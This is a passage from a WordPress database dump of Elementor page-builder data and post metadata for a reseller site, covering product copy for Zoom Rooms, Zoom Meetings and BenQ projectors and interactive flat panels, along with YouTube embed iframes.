_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"fcc54ee\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">Meet with anyone<\\/h4><p class=\\\"mt-1 mb-5\\\">Include remote participants on desktop, mobile, or other conference room systems.<\\/p>\",\"text_color\":\"#000000\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3c1657b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">One touch to start meetings<\\/h4><p class=\\\"mt-1 mb-5\\\">Leveraging native integrations with Cisco and Polycom, bring one-touch to start a meeting through your calendaring system.<\\/p>\",\"text_color\":\"#000000\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"406125c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">Centralized management<\\/h4><p class=\\\"mt-1 mb-5\\\">Get the overview status and management of deployed conference rooms in a single admin console<\\/p>\",\"text_color\":\"#000000\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0518cb7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"92a3de4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c7f20ea\",\"elType\":\"widget\",\"settings\":{\"title\":\"Zoom Rooms includes the following value-added services at no additional cost.\",\"header_size\":\"h3\",\"align\":\"center\",\"title_color\":\"#000000\",\"_padding\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0e401c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"428f120\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a4857de\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Digital Signage<\\/h3><p>Digital Signage gives organizations the power to manage corporate communications, internal marketing, and more across multiple offices and departments from the Zoom Admin Portal.<\\/p><ul><li>Leverage room displays when not in use<\\/li><li>Manage displays at scale or individually<\\/li><li>Unlimited amount of displays supported (both in and out of conference rooms)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b6e2b30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8217db2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Scheduling Display<\\/h3><p><span style=\\\"font-size: 0.875rem;\\\">End scheduling headaches with a beautiful display that provides room availability information and capabilities to book a meeting for any available time of that day.<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e1221c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cf0ae88\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Make interactive collaboration easy with touch screens<\\/h3><p>Power up your team with Zoom meetings on collaborative touch screens featuring screen sharing, white boarding, and co-annotation\\u00a0 all at the tip of your fingers.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d2912a1\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/gezS90Pg_fk\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d565e7b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c28793b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"29d7347\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"1\\\" ]<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6201,3055,'_elementor_version','0.4'),(6749,3278,'_elementor_data','[{\"id\":\"f779967\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4678335\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7ed7379\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h1>Projectors<\\/h1>\\n<h3><\\/h3>\\n<h2>Business Projector (Smart Design for Presentations)<\\/h2>\\n<h3>High Brightness for Well-Lit Rooms<\\/h3>\\n<p>Ideal for lights-on presentations in bright meeting rooms, BenQ business projectors produce high brightness for effective teamwork, collaboration, and note-taking. The high-lumen output ensures brilliant picture quality with vibrant colors as well as crisp text.<\\/p>\\n<p>&nbsp;<\\/p>\\n<h2>Interactive Classroom Projectors<\\/h2>\\n<h3>Enhanced Learning with Smart Interactivity for Tomorrow\'s Classrooms<\\/h3>\\n<p>Futureproof BenQ Interactive Classroom Projectors empower collaborative learning with pen or touch annotation and short \\/ ultra-short throw projection based on brilliant laser or lamp light sources.<\\/p>\\n<ul>\\n<li>Industry-Leading Dustproof Design: BenQ Dust Guard<sup>TM<\\/sup><\\/li>\\n<li>High Brightness from 3000-3500 ANSI Lumens<\\/li>\\n<li>High resolution with (Ultra) Short Throw<\\/li>\\n<li>Scalable for Wireless Use and Interactivity<\\/li>\\n<\\/ul>\\n<h3><\\/h3>\\n<h1>Interactive Flat Panel<\\/h1>\\n<h4><\\/h4>\\n<h2>Meeting Room &amp; Boardroom<\\/h2>\\n<p>Digital displays help businesses improve meetings by presenting pertinent information through presentations, documents, images and more. BenQ has a variety of digital display solutions such as High Brightness Business Projectors and Interactive Flat Panels, all of which have been created for ease of use, and to increase efficiency and boost participation for office environments.<\\/p>\\n<p>&nbsp;<\\/p>\\n<h3>4K UHD 84\'\' Corporate Interactive Flat Panel Display | RP840G<\\/h3>\\n<h5>Work Collaboratively and Conduct Business Efficiently<\\/h5>\\n<p>The RP840G is a modern enterprise\\u2019s one-stop display solution for picture-perfect 4K presentation, seamless communication and real-time collaboration.With the built-in EZWrite annotation app, employees can instantly open a wide range of documents and directly mark on the screen for efficient idea sharing.<\\/p>\\n<p>Whether for brainstorming sessions or year-end financial meetings, the RP840G works smoothly with BenQ\\u2019s wireless presentation solution and allows employees to stream content from laptops or smart devices within seconds.<\\/p>\\n<p>Featuring an open-platform design, the RP840G also offers unrivaled compatibility that lets employees work and discuss with the devices or software they prefer. And to encourage workplace health, the panel is built with proprietary eye-care technology so employees can focus on their jobs without suffering from eye fatigue.<\\/p>\\n<h4><br><\\/h4><h5>How BenQ Display turns meeting rooms into places of efficiency<\\/h5>\\n<ul>\\n<li>Present content wirelessly and instantly with&nbsp;InstaShow<sup>TM<\\/sup>, a hardware that requires no software and allows up to 16 participants to connect notebooks and take over instantly<\\/li>\\n<li>Display stunningly bright, crystal clear images with reliable, flexible&nbsp;Business Projectors&nbsp;that capture staff attention, while simultaneously streamlining company meetings<\\/li>\\n<li>With Big Zoom and Lens Shift capability, flexible installation and easy calibration is possible on&nbsp;Business Projectors,&nbsp;even in large boardrooms<\\/li>\\n<li>With BenQ\\u2019s&nbsp;Smart Display&nbsp;plus InstaQShare app pre-installed in your PC, smartphone and tablet, all presentations can go wirelessly.<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"1\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8592,6,'_elementor_css','a:6:{s:4:\"time\";i:1571986873;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:5:\"empty\";i:0;s:0:\"\";s:3:\"css\";s:0:\"\";}'),(8593,1532,'_elementor_css','a:5:{s:4:\"time\";i:1571986954;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(6206,1620,'_oembed_65bcd052f6df85d7025c055a531e421a','<iframe width=\"800\" height=\"450\" src=\"https://www.youtube.com/embed/yRQGXlJS-xI?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),(6207,1620,'_oembed_time_65bcd052f6df85d7025c055a531e421a','1553137133'),(6208,1620,'_oembed_150f87570abc442c7a6f0d8fe7a575e4','<iframe width=\"800\" height=\"450\" src=\"https://www.youtube.com/embed/gezS90Pg_fk?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),(6209,1620,'_oembed_time_150f87570abc442c7a6f0d8fe7a575e4','1553137134'),(6210,3056,'_edit_lock','1552296347:1'),(6211,3056,'_edit_last','1'),(6212,3056,'_wp_page_template','template-fullwidth.php'),(6213,3056,'_hide_page_title',''),(6214,3056,'_hide_header',''),(6215,3056,'_hide_footer',''),(6216,3056,'_hide_breadcrumb',''),(6217,3056,'_cover',''),(6218,3056,'_show_excerpt',''),(6219,3056,'_wc_apply_product',''),(6220,3056,'_yoast_wpseo_content_score','30'),(6221,3056,'_elementor_edit_mode','builder'),(6222,3056,'_elementor_template_type','post'),(6223,3056,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(6224,3056,'_elementor_data','[{\"id\":\"417e0ba\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f0ea6b9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7770038\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Zoom Meetings &amp; Chat<\\/h2><h4>Enterprise video conferencing with real-time messaging and content sharing<\\/h4>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b91aee7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f471498\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"17\",\"bottom\":\"17\",\"left\":\"17\",\"isLinked\":true}},\"elements\":[{\"id\":\"ce0af90\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Simplified video conferencing and messaging across any device<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f628137\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"797a5c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62dcd05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Unparalleled usability<\\/h3><p>Enable quick adoption with meeting capabilities that make it easy to start, join, and collaborate across any device.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f241128\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"362c434\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Join anywhere, on any device<\\/h3><p>Zoom Meetings syncs with your calendar system and delivers streamlined enterprise-grade video conferencing from desktop and mobile.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bde0386\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1c1fd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Video for every 